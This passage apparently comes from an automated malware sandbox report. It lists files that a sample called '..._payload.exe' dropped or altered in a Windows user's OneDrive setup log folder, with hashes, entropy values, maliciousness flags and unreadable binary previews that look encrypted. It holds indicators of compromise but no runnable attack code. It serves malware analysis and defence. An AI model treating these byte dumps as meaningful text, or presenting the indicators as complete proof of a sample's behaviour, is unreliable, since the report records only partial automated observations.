                                                                                                      MD5:01FC3E890F23D6A088FB3F94C3B9006F
                                                                                                      SHA1:9B963E1499940C03DDF53842F85EE46FAEC1495E
                                                                                                      SHA-256:C0E85BD85E1FA6036758039CB6F8C73CF494EF38ACC2E6B194F0D2D1369410D4
                                                                                                      SHA-512:CD2E68FA6195B930355E162FBE65D551F241B92F2A40F62DFB1250015D0FC87EC994248EE62BCE679B113E5C5A7A53AFFBE62AE6782435B357781EE2539D92AB
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO.......,..Z..R...kym.Ho0.T.....*..0N>.j.9..gy......h.".n...1?llW.Vd....R....0.....`;..x..."/._}).I!..<....F.l...z.....%.aA..h...f8.p.$..U....Z....N....@..e%..c.m....b".![......!3.8\f...a7...s..U6u...h6.z..(.....X....R.I..?...|yU.V.f.W*...9...Q...r...Rku.Y@..Z!h4..#......../.c:....m..}..3.;d....i"..!...).!eQ?......."...^.}~F9.k.F..CC..~@2.'.Q....P..~3)...Yb.\.Wg..,...=....V;_.....{,9).f..Di...1.......lo.I...U..0.[....H<.......|D..:j.1.......'. ]|.....D@.F...2.a..[.dB+@c..D....v..0.:.".R+..k9...E@..d.$u.^.4G.,f..yJ....V...R..V.0..cx..P....5A..o.lb..........m.O..\.......0i.SAy..K".mFc..c.......+dn..I.@..\...g...[m.....^.;.=.b..=t.]...I....kNY.R.A_8.^|.&M...J......)..2..ww...mp...J...s.Z.:>......Bn.S#.F...G<A...+.<.m.+.p.pY9I......5.5.>.....C.U)".D..rV......#R.t....Q.....!.l.X...P9......o..~6...8E..c....1.x.......@Q.w.....X.r.j....J...5R..e|@=ei.E.1.,.c#_v'...A...d_.N.'..PG........,b.?.....&A.O.b.....zK.A[...S.D.DEO@|{..7.^._#K

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-03.1150.4240.1.odl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):2.8948037426240325
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:QKRqeZ486J4VF5nV1zZ7TX02w3BS+zVyBm6cJczznr8NfGMbs:QKRx48S4H9PSV2SyIN0
                                                                                                      MD5:60E8C0728A015ED7705D94C138C90925
                                                                                                      SHA1:A33D0B8CE6CC2CB42C8BFFFB440BD6CFD77D9F31
                                                                                                      SHA-256:67CFB8026BFA39C75B4549BCCDA27FF96D47B1568093854D392CBA5825276043
                                                                                                      SHA-512:0927C80C629C28AB1C2EBF439CD62FA86B1591A344C574B67977D0BC0020AFD9999AF205DA76B3510878D7C6617B5261601BDD6781DB188D2747F7B3D296EB30
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO..4,.......$.....y.@..v.g...]....0.X......=.PU....sO.m.BL....B..T.Qu.E..l.......p..n.}r0..&...m~.......Y..Oz>.cr..G.`..S...T..1....[S.......|....\....D...4..x.OK9......-..y...0.%B..7....8.....*.......$Oe..Sp.=6...n..*....~.#...CLk..r.x....I..#G.c..d."...p..=...mL.*K....M.GN.1j.=3.!8..C_.t..:.x.K9@..(.3..K.~)Q....... "....'...B ...._I.w...w.8.....|<m...1..).#.&.I..2S....C.1.3.k..Di.2n.....>.K...C.....U...i...T.4.`.S...HL..Q...-Z...%4...][......}).<.F....D......#.1...o.Pt..g.....8..m...&.0F...h.T.?H.....S?......G....pa..?.../C..g..?,T.R'...b. .g.B....xd..b.....U.gyU.....%..F.|V.h.....9G..Gq=O......5,....[;.8...........+...8.y5.l`...&.w.Z....*G.W.....W.5..l~...3$....6.d.....fmfl..LAz.x.?Zqq.......G.G..s+..]...Oi~Bm.6.....|$c....f....@..K...=.....F.y...F.....|.`....L.S.HF.,..&....C.B*.~.........o..q..f.U.x."-....'..TCsMb.A.R..Ey.m...*.A....E.aj.^s>5|..^.G>.....yx...;4y1.U...'..Z..AA.B...k....|..%..fD..Q.qk6....i..m..../..Tz.5|.r

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-03.1149.344.1.aodl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):1.0122701746110254
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:bc1c/DP3XacZmimRc3r98T1AUokrwGa81Poi/yqUEHnaxFbHSAVLH+6nI:bcOz3XjcXRc7SZA3swSPT/1UhHSAV7+
                                                                                                      MD5:FD5090FD883C48BA1DF42B66377F35AE
                                                                                                      SHA1:ECE7CD2F43EB67C0600183FA02C00DD998F61234
                                                                                                      SHA-256:F27C3A5F7597B794F00BA40329C7403FEFAFF68CA8A2FF8BE23F076077A0F1D2
                                                                                                      SHA-512:EFFF56F386711E6D90831D9BF9F32985E6FF95B0CB995CA7F8850C61E73251F72C444974077C9A8E40B21C9D00980521601E3108874FFE1A0941E5051AF4CC3B
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO..2.d.X....f..[....6.........HC....L.X,.......y.j8.r.A1vP...n8...,Tn.g>.o.'3^..v.~....B..K>Tq8..{...f.._..?...E.!Z.I................|.A\..fM....L.J......`.ld.p$p.6S\9...q.0jC..}.......Ms.......t>...Y?....]x\e.%.l.._/..F...%..Ga...F..Xn...c.?}0tcB.Q.4.H.|.&#cU.z&xJ....3.3}..H.p..%...J..#m.I.P.......{.......<.......Vm..Vh....L..)E.....-.L.........}(..hG.J...$......r:......`...):4.4.6...v@.] .)..G7..nw......Y....".\.*m._.qef...s.i:{.%.)...y...R.3.b:..,o].ZAz}..[.<.-Mn.+..p.PQ.....U^...[..f.......3O.P...|kQ.,....-.g..Dv$<.8.2A4.9o6.B....DyE...j...y..X..;.O....3.6|M...Vfl..B.....m1.;%..I......n.k.(...w.p....&RZ..@...=.O.K.............G6..N:c},..;....f..R:..F....E.y..@....7h._HWP.k.bY....!s...:.#../........z.........f.z....=6..I'..Q..\.TB.I..},.kdn5.sk`!A....=l.....@?...8..]E~.[.-....U.nj...y............-..R`Y+7.HY.~....uI..qY....?;.....}.a&=.15..'.=.[g{...P..~(.S.s...O..onP<.$.#..5..;_vo....*.. ...9Nm@.TL.O*....U..5O.....E...e...A

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-03.1149.344.1.odl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.20521525432741347
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:pVGDJiz/k0kQQ5nB9lQS7wB0K39F+CDUaqqv6bz:iDa/W5nB3rEHoqwz
                                                                                                      MD5:B905F190BA1AF75AC68A6E34E1220A4D
                                                                                                      SHA1:C97DF89DD2BA294B3A8137C2EE7104D3CF7A1F80
                                                                                                      SHA-256:C0694D080B73E85800EC530735AA7F6427A9F553C791E5F0792F58437A99081D
                                                                                                      SHA-512:979780FF7BD9B357F610E7F9978E2ED891AC2948C5C771F62502B1A58D7ED2E960C5D605191E441B1452208FF9557E99A891607606B7B73FC63A2496A1D651F0
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO&.X_...=.i..C.".B *.N..8...j.Vz....q....z!_..:.A.H.........o.[...@..$,.rT+Z/.=+....Zc........5.)W....^......d.....1...Gl...Nh_....!XE....jwq..H.,%...[..Y./..@..-...C{Zyc..N.^.XY.m...Ya3.Ac.E...p.6d..gy0....Z6.9&.^d....q.%d....<..?D...5._{.`f3....Eg....Yc..};N..O.;`...(S.gimq.m..>...Ud..3....dx.e..D....C.....(.xm...0.a...#.R?.3I@.+u@...I..-.m..g.v....x.{..}.n[..{Vo$.:.|.;..."..........[%..|".....n.....M.....L.K.......&...b.#...........f.<.Sr.....y..Z.-..0.g.....8..4.Cp)..(D.(..X...](f.g.}.w.M.B#u^...(N..-.v-.4.)s.......wvD...,...1.....1.....-..A...,.........m......mh.Z)WK..KjH..n...E8.`t..@X....%....3.^S.f0...........e8........H&.H.p...a ..1.W..G.......GN...T....L..&.Z0..1.p.UjE...s2s..E.#...o..._.qp[.h........_\...W77.+.L.H+..nR).Pu.."..Gf.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-03.1150.9064.1.aodl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):4.688822305193168
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:cRG1SKAdzIor8lEBkQJ+GcFoH3uIbriFd6NcYi:ez9rFkwcFoXfiFMKYi
                                                                                                      MD5:359D30C3E7A5AD9C88271529D1FB7211
                                                                                                      SHA1:BB68439ADCF3F7D15118D28C2DF924CBB03FA7ED
                                                                                                      SHA-256:E4130CBF95A71134E13F9DE18118F738AEC9921A229D90FA8916B8BEF35B145F
                                                                                                      SHA-512:D4B8545DCCDBD0F908C777F98A541CDE2FA9D12B3755F5D3E46AC58C83C8BA1BC8731D3D067032434A96CCFB918CBE2D7E84D45D86B21454A7C4645A94A1229D
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO.`.>O...?Gi2`..$h.r.j .pd-{..2g......|.....d..0.U.......&g..-.<W=....J.w.&......Fs....1&.M..;....6..c.....~.....e.q5..(.(......."..W.9yfkM..]...>-..*).e...U.....j.#...<Ko<.).*.l7..Ug..QQ+....f.gP<..Z0i...-y.c....GY....).m..%.p.j.3/...1...u..U@......1"...#..*...).1."......D.=.....6.O...*.....p...u#...{...+w\m.(:..`nr.'0s.x.v.....l......|.....'..u{.;....Q.......ggo2......J..;..oC.6...%.4#... tx.n..'..x<...K...~.9.`...d..Z<...s7%o.m...R..&....*{s.P.......E....(>...q.%!.......9.P7....N....5t.m ..Ml....X..vY...gB]....^.....r.6 .........4\.g.Zy.=.7\..GU.xZB..6.d>*I.....M...g..Z.. FU,......X...w..x.......jO.8....Je.!j8.~...]..}...^,D=z:.b.)..[u..?..N&.|..!.7N^.....y..}.?I.O`^.....HP.#.T.?.na...E.....n.$v.j..W.s.i.~...tJ.%..`..N0pi:5...J;y.rRpp..}..lEc....|P..c...t$.]yq.;..-.r..............."..G.....:........2.U...,...9..?...u.a.x.W...7.m.................H.......ho....G.v/-..fL.....:....K.ng.......JF\..9.I.j.....=c..Y_pj N:J..A.....o...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-03.1150.9064.1.odl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.271191519913846
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ZsnmX5FARr3Q1MED3SXEOB4TCGzBBDGeM83IwbakxG7Tx0KDG6Rmv6bz:SnuFARrQ1lD3Sh4TCGzzR36K6Rmwz
                                                                                                      MD5:874824A372BFB1D5F050F0A808146EBC
                                                                                                      SHA1:CD62DACE936C5ED512A1792DD95C738692F61BA9
                                                                                                      SHA-256:F4D4E5E76AD1CD2FB8C8FA117EFD3601B1F1A656E7F4AEED93F2ACB5B5697936
                                                                                                      SHA-512:883F491CAB33C9BEE130430AA690C4C8EFAA664306E24EB9825D5629C0D39ABA0585103E0585E59073889077549565C61B74CF245A65A4D26830D592B1BFAA59
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO.m.";dN6P5...z/.....'..!.1...t.."k.<.8..^Z#...\..z...My.c^.)...l.l{*....:....H.Z(q.-$..,Z_ L.<w|....<\*.8.4.y..j....f.E......x.PX...>.........q.7Rg.q"....C.....c.}.......N.e...c.b..(..r.J."A4..1 .:....Ha...........(P0..nrW.....%....j....P.....Y9K.(=.F.....M^.TW....P.y.>xb..2..n...q......>c.w..8..,.~.].....8.#.N.DM.l.8.H...V@....xL..Tp=.......9..].~'....$....t.k......l.9..0c*.V.....>`.....^vP.zI......'....W._c.N...C.96v..(k..r..A.0..Y.....p/.3p...W.t_...5...L...;..8cw.....P..+:~.&`...HF............/......-....6t.W..&d.`./......-.P.....$n...........!....e..(E:...<,..p~.j...Kg.J.<.......v....QQ..H.6Ho./.?..'...m.!.f..,...h....'..H.....~r..........K(.....T!...s<`3..V.x'...yU..Z....i.R.......~yFK..mY.%..U|SB.ODs.h!`.".}(.p{z>.*... .\~.G].^k...q.#."}..)....5.9q....d..B...}..Uw...i.....#.....s..R.zA.._.{I......[...!k...4..S.+.B`....T._i.-..)...b.pg:..=.(._OCeQ..RI.;...\...............3......?..Z.M.Z...<....q..~z.G?..8p.../9YZ..ns6^u..&...D..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-03_114938_158-b2c.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):131072
                                                                                                      Entropy (8bit):7.909620455321488
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:zRfez0gxGEynt8bl6HFwbJze/gEYOCD++WACOr7:v4e2bMwKgEYBDpTCOr7
                                                                                                      MD5:2EBEB7F85D6142334D9B8A3B9A0D9ADF
                                                                                                      SHA1:BB1909A89083BB727F4E4C1A1DEE0C3A96EB0C7E
                                                                                                      SHA-256:9390483529312B77F42DE04D762A9F500984DC890B4419C52AC504A41E5CA0F9
                                                                                                      SHA-512:3B0D76A46F0CDCC05BB07A431A7BB43E16CE74BA564A704E7915371D8AD2AB0731A79C58EDCB8E53E7A388B2712CD057EC5B52F3BB7BFC40584FD9EC33887B1E
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./.y.0.G7.iOZG.....#&0....8u.v...n.".ZC...;^m.(......d.....%.=...^...BFx..5...{..w../."|..85%. j...7.*G.2cUt..Q.d..3.J....T.4t.yM!....$...d............/{.N?Y...S.@R/..q[.`[..J.r{.8.<!RLu.k.P.h....S...<.....I...m46.. .!...=.jo.u.X.1..0E=.>.6=@ws.3.r.#.X.`.b6.x.O..t...5...'...}H^Ct<....~...xP..F.3..1.......$...!..2.......:Hd.a?C4..3.}.........".......M.y .0..}_.....a......K......h9R..../.u{.W.....i..yY...}.r........C.....04.W.....c..~....v.D?...Ow.B..8At....t.zx.......*.DSg.........*.... ....z2.T..(....c...3.H.v^.u...8..|=...:...........y.Yt.A.9.....f.%.....q....8R..(..p........Ur`&T....1....'Z..g.f|.$.Tx4v:..D.B\.;..Y<"^.(p(.....+....mt9JJ...=29l.N...#.u......<!.g.."RTyQ...[...9@D*r.?.n|..ma.,..c.g.wk..6.2"../h~6.`.....{....n[...3..,.?K..p......(`.~.-.&..r...dJT"....~*....E...........qG..../..k.3."Cz...}.iI:.O.e......02`&....m.S.R+B..I.W.>.`..x....#.C...zQ>..T... G....L...n.(.........B.@..n..3...A.i...*.*p,...\a.'g...)..q

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-03_115005_9064-2616.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):262144
                                                                                                      Entropy (8bit):6.794788052842261
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:xFmMVWW/vXY9Uk9JJiwNFxZkw9rpUD7yihLFk8acpyNzk8/KTvdr68up8tN:T//Yik9JJiwH/kw9rC7yTmoIpY
                                                                                                      MD5:A703D9509DE7E25E7B4C1CFCEDECC805
                                                                                                      SHA1:9439C4E6F341E1EC0D6403BF42DC5D9F0A5A10FA
                                                                                                      SHA-256:715AD98D9FB1C9BB70365083C40D9257F9CCBCD89B9EF93128F5719560236B01
                                                                                                      SHA-512:4AB728F82801D3F6A3632A79EE547EC0367C0877495225B7FC33D46F0143DE60A14E7C4657F4A147BB4E1217902F11BC3C322D0783AF546CB71E3D8FBB114836
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./R(......zL.wR.=._..J....h}...8..2.Y...=..~5.F.2...P...FD.A3../..[.g.....[|d..:........@....53..@..../V.....d...5.S.........N.....N..dQ...)....4.:..a.5......9....Q...8...>...a9.5..'...;...I.\^..g.zq..5.y>..^..(.R.v..k.6......w..M..u.8)4z.6k4J.0...\.QKp..+hF...j.;y.^h.4L..17}G.G.k.h8.N..^g..p.k.....k..1.q..[@..+$!.rJj#.I......4..+z~..}..}.. E&.jn.E.y=.G.M..........Tu.&^`...6.J.D.Q...%......+|.....o.B9......GZ..a.~..v..=.0...q.k_.$..l....=.>.".\]p.^...$..;h.../..qC,.I"...oy.Tk.......i.J.....o.<........B.T.....n7....R..[.33.:.d.+..U.5....... <.`..5....qBJ...5_/....d.V....N5S_...w)..c.#..".]J...;.Y"&...Cg....*...}.....|J.t......(j...5(fA..^....zY.-..A......X\..pm.2..9.Z.:...p'....d<u...w.....y...b........4....z..........2.d...vX...E....8.I..:K.9..f.y..1....k...u.@...X...._v.....1.Zw.......E...rFc?.....C.BU.;.S...b.m.x.D.Y.<.j.L..#/..................>.5.L...b...?./.F...Qn...|b..r...O.....\..Osc.6U......z.....@.4.FR.....k.......'...).=.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-04_093243_16a0-1d8c.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):131072
                                                                                                      Entropy (8bit):6.6504838848617975
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:+RCLSAnt9hUl/DnT44/iO5Y7zvjLv9z3dx1amQ1pnlPUdGX9fHhR:aCL5i44/iQY7L9zNSmQntfH
                                                                                                      MD5:43732FD05DDA223CA45B0921979F880C
                                                                                                      SHA1:6B77B0D64F3F51564D45E25F344481FAABC8B739
                                                                                                      SHA-256:7498E236F29D427938C5C5FE5E025CFA53F8C8C7A3CFAEF3E916F5F087100530
                                                                                                      SHA-512:026FEF68BB55D1911133117739B58164881C1EE1EC40ACA414331961A94B6FA74F109C5A746A27220B279F361451138CEF65C5CD45B99731A910D1843AEC5E09
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./..g&....w..L..;....$aB.EK..I.^..1EE....K..|..`a..I..Y....}oC8...!j.$B/.V....`uM......Uc.%.....%....$+D........p.!.M...i.D....$..y.p..c..Ak...dx.1Gj..@G)4%.3y.+..].cP.FN.:......-l{.W<.=......S..dPzpD..y`>...r...pu.8I....L"n..\..j....).....}.1&....n...w..{...[=*....#......F....]........"...n./.Y.4...S%wP.>F.y.....,".z.V.P..'..uW......c.Md3"..KO.j.&H....Uod8.B.e/V.....9...ymX.7z.....D/.s.E.s..N.>).6m...E.....|...-VN...i.Ef?|.q.C.w/.....+.....-?GSy.0..G...A......xI...8.~...}.h.../...6:..r..<..H.o..2i.sdezx..?wt...r...6....t...O..p.iM..2t.[f.G.....(....k...OG.......yW!...<.@............l..^....h..L..?r.z..AK?...5..5....x..A.x.}...a..6.4_.............(.(p.>#.O...mD.IXf...V....F./.v..._*.|.=........1.).K....7..u..s...P.c.S.....b..0#.F.w....3..i.L....R......3....Dn.Nb.O`..}.F-d1...`.7b.dC4@...Q.W.........@..R8..@g..jq....pS.c:....j.;...0^ET..<. ..z.K.y....9r.zR.>..U..w.."..M...8......$..S....q-.....?`go(.........rKm..VS..\.....6z.Z

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):30630
                                                                                                      Entropy (8bit):7.994240892356268
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:768:Nk0dZkyKlUA4hrlPLXosvYfRgmur3J1r/nF:ugkLU1llPLCKm0TF
                                                                                                      MD5:333029E957ADB325AEC60939B46A84EB
                                                                                                      SHA1:D0D45F4D7EC0E4B7CA1C1F43DFDD5704446C8BC2
                                                                                                      SHA-256:25B5780DCAF548E4BEE604F5EB64A2EF2D1269A679389349595046D999105EA4
                                                                                                      SHA-512:AC122B95A414AE8349546024DD281776572002E59BE7285719059387858A8364713EB8344CA892920CBA821099F60232AE35400FB1B79119B0BDD8483D4C4FE5
                                                                                                      Malicious:true
                                                                                                      Preview:1.0./m[.FX.W.I|..\N.1+..{.n........D.D...TxE.y...8......6>.Z..t5P....2........p.h...~...4.o.@...S. .c[.7...-.{.=Q0FdW7~.......8?..A....=y.....{A..dX.BK.h....v...'r.\..g..;..%.Q..4..a.G.-{TX....7."p.N.`Y..d....-..3g6..{v......Z.$..3.(r}.-...A...s".aY5.9..........i...L..,..}.W..h.Y.|-r..)6......I..T.d.7.H?!.1...,.....T\...v.2.6..v.j.l...J.....#Sr?x...Dv]........kC....3P\...M.d.#...y.|. ..}....L..3C.\..h...gX...T.y....a?._...O...l.BV#$0.I.PC^...<...D......`7..V.p..|.(y@.s{v..........$.;.L.m.a.7@...j".T.n.@.XF...<.0......7...?o.F...3J..\fO...=+.P.......M..^..H..=(X._...........Q.....{.],ov..DbP........-.....vht-.z=57..k.....LAg...>..,.....n/P..9........4.......P...I..."Fmq..>.w...w.._..,..=...@{..l(w.m.Z..6i..E.....(...>'9.:.!.+..'L....zT...5..W...}.......p..&........M...Y3R...........+2.. ..P...%\.Z(..5~...Z.z.i.,-K....z..H...c.....&....z.r.6..Xk.j~.!.d..w.W..mL-<@#.....(I......m.W.B....G.I.L...o.3..Q..e....i..U..*......`.!..3.j.1......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_115005_4240-5892.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):4.499093213256076
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:SnBEvbPN/ivlNdwElxjcwycWGeg1MhXd8:u6vDVCOqByCeg1Mld
                                                                                                      MD5:D61E5B6A0D1982172EE539B0AFB6C1EC
                                                                                                      SHA1:502E4A4075E0E5D54C4DFEA405E0C07775B165FB
                                                                                                      SHA-256:3C2FF1B78B4386088C41C9F934A1BB452038F6EE7CDB983B06991316231447DA
                                                                                                      SHA-512:D7DD05E45A8D196952C47912F929797838D281EE9E5B32EEB6AC5B71A51A4471BA82E625FAFD3C72BACDECEAD85C2D8B7C083A0B0D4394BAA4B3A5C2001D4569
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./...Q...=.V..c..`.B..x.i.^....^...-/b........p...-{0K.-..I..x$.............v..<...n..](1M+w........x)..C.-....1.^.=.5X.o..uu.3...S..M.F.s...{/.(...w..tU,.IG%..G..'.....6!.C..9]..O..VN.%.W.I]1.r.....EID9x...H;.n9..uV.0...C..........Gy.....GHC.uSg.Z.....[\.{!.U..{U...i....w}{m4i).)...|%.]Vs.ww/-..G.5.O.,jAKI.Fg.*.T6........X"......]...Rr..b..1....PG..1..J...]o....P...E.SJ.O...O9xX......U9.B...r..W.0....k.8...-5.ZN.@by\......zO..n.P.[3}.`s..8.....f..$..f...D!E..ro*..Ev...^..*.5F..$.~...................0D..=.by.L..2..:..!.?..7..MSW..P....9.Y..0.j.Ne.S..n.C.%@._=$.lI.....'...w6-@...W;..~..'..H...@i.....jY.2.g..h.`.%Nc.\.Sk.......X..Zi..+.M..HS|..dR|v4x."6]..m.Y.)*^..J.|EO0.6.&W...SN.}..R..c.~.....?l.9...),..H.$l.......84....a..]^..^.C.]8..ltE.* 9c...'....._..T@.....Pv{6..N&...d..>.....T..rE.;...a]EtN..A..,.+t..E...}x.%.eW......z.7.QK..@z........;6....i..Djg7.0jva..........._5..{...I.L.B...?....HLd....k*g.z9..wP...e.H.F3.....9...%l.,:(...:|

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-04_093243_14f4-1074.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):131072
                                                                                                      Entropy (8bit):6.628352136171356
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:1/n11wPdJC8koiMR9QzoMNl0+eigm0wEJ1qL0bRiLYouEXzYcXzDrBgJ:ln18dXbZ9QzoMWi+1pbRiMoVjzzDrK
                                                                                                      MD5:848391D039ED814307AA1144E835E0DD
                                                                                                      SHA1:96DAC4A452E829FB04C9A281F507138316908FAD
                                                                                                      SHA-256:A0F323A338F1680E2336263BA4E737F7D45330F9E8E039D36A3AA25E00546F87
                                                                                                      SHA-512:A703F961A47B3C2448E58CC7D9F01CF9F08DBFB070E2015FBE38AA69A651F088C7B1FA710D935EBCDF318936AF5A2EE1C68424A13599CDFBA4EEEB715194B4EA
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./.`,...&..;.hUA.hu.(!.w..}p._3..9..2I.;.9..*N|a..h2Z5q.JH..a...XHPus....N.3..Q.A..i$.z+>.......Y...,;.o.....p.!..K...jhZ+-..A.UA.n7.hc34..*9..a..g ..1....i....\..$...".,+....Cq..h;DS...I.@Em./..j..L.wy....'q...3.....B.%..N.......:]..7F....Q..j.g..p.hJ.......(X...{.xHE5..;......0r..$.%.s0D.tSk...}...."..,Q...=F.E...t.....7..:.<..&....gpy..\....N(.oef.R.!..%A..N..I...|...+6..5I.@...J.-....6*,c%.f.X%.kmh.ei..w...?s4.m<..H...w.f..w..9;....}5.......iuS~iH%AP.$SAO#3.y.F.Z..wt_.9v'.R../..z.hY....z....... 5.\........ga.f../..4w.....gZZ....?.H.kw.............I..zt,..b.8Q/..y.......g....x...N....6..=.xoWDd.. ....M..7;....{T..8..J.K....l.T..A....T.i.T./..W)E.,..j..%.\....t!.|.]s.n.....=.T..|.mr@cu.^..........n..x..K7...d....{I&v.p.(...K+........T..."|....O.W.4.|./......:-...hZ....a.......E].a.../T... ....(.i..J...h..\...B..i...Yi.;xBz?...w.Ny...5........N.7.....zi.x.B_?..J..."Ut..(.J.....2.e4..C...u...D.../...s7.../(3?..j.._.}.r.!.9.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\StandaloneUpdate_2023-10-04_084137_4224-6092.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):2.1012479407403832
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:RmJfBT1yH6hcGH+9E/8eNfSvQO3Y+14P4G4y6kJzDEcatRPEdv8AhzBqHyp:YJ2qcGHmQqoAOP4G4yBJzDKOE+qHyp
                                                                                                      MD5:F1BB0081D65618CAE87DB0128B1C4DC0
                                                                                                      SHA1:4D483E5A0B71FEB5DE3572F1DC72A1046C7AF839
                                                                                                      SHA-256:CD8DEAA3FD4B099A8B4B7D35FE33809D33525A57908971E7EF41671408D54785
                                                                                                      SHA-512:5C6A121EB97CFF2C89ABA687F2A698D2501DD66E96D7F2C045D719A9CCCC738171BDA9031781775B45952767B66958BCC0D0760BD5301DF01712F3B9B8427D81
                                                                                                      Malicious:false
